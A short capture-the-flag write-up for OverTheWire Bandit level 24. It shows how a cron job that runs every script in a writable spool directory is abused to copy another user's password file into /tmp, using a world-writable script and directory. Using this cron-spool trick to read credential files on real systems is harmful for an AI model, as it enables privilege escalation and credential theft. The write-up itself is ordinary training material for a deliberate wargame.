Bandit - Going to Level 24

2 November 2017
OverTheWire Bandit

Goal

A program is running automatically at regular intervals from cron, the time- based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed. NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level! NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around. . .

Getting the information

bandit23@melinda:~$ ls /etc/cron.d/
behemoth4_cleanup
leviathan5_cleanup
natas25_cleanup~ semtex0−ppc
cron−apt
manpage3_resetpw_job natas26_cleanup semtex5
cronjob_bandit22
melinda−stats
natas27_cleanup sysstat
cronjob_bandit23
natas−session−toucher php5
vortex0
cronjob_bandit24
natas−stats
semtex0−32
vortex20
cronjob_bandit24_root natas25_cleanup
semtex0−64
bandit23@melinda:~$ cat /etc/cron.d/cronjob_bandit24
/etc/cron.d/cronjob_bandit24
∗ ∗ ∗ ∗ ∗ bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@melinda:~$ cat /etc/cron.d/cronjob_bandit24_root
/etc/cron.d/cronjob_bandit24_root
∗ ∗ ∗ ∗ ∗ root /usr/bin/cronjob_bandit24_root.sh &> /dev/null
bandit23@melinda:~$ cat /usr/bin/cronjob_bandit24.sh
/etc/cron.d/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing␣and␣deleting␣all␣scripts␣in␣/var/spool/$myname:"
35for i in ∗ .∗;
do
if [ "$i" != "." −a "$i" != ".." ];
then
echo "Handling␣$i"
timeout −s 9 60 "./$i"
rm −f "./$i"
fi
done
bandit23@melinda:~$ cat /usr/bin/cronjob_bandit24_root.sh
cat: /usr/bin/cronjob_bandit24_root.sh: Permission denied

We can see that the script cronjob_bandit24.sh executes every script in /var/spool/bandit24 before removing them. So how about we create a script (that will be executed by bandit24) that copy the bandit24 password to /tmp/bckbandit24pwd ?

But before that, we create a folder in which we will create the script:

mkdir /tmp/bckBandit
cd /tmp/bckBandit

Here is the script we create, I named it ’b24_script.sh’

/etc/cron.d/b24_script.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/bckBandit/bandit24

Now we need to change the script permissions so that anyone can execute it, and the directory permissions so that anyone can write in it

chmod 777 b24_script.sh
chmod 777 /tmp/bckBandit

From there we would just need to copy the script in /var/spool/bandit24, wait for approximately 1 minute, and check in /tmp/bckBandit to see that a file named bandit24 has been created and contains the password to the next level.

However, there is a bug in this level, and this won’t work. Note that if you needed to know exactly when the script had disappeared, you could have used the following command that refresh a ls every 2 seconds:

watch ls /var/spool/bandit24
Back to Write-Ups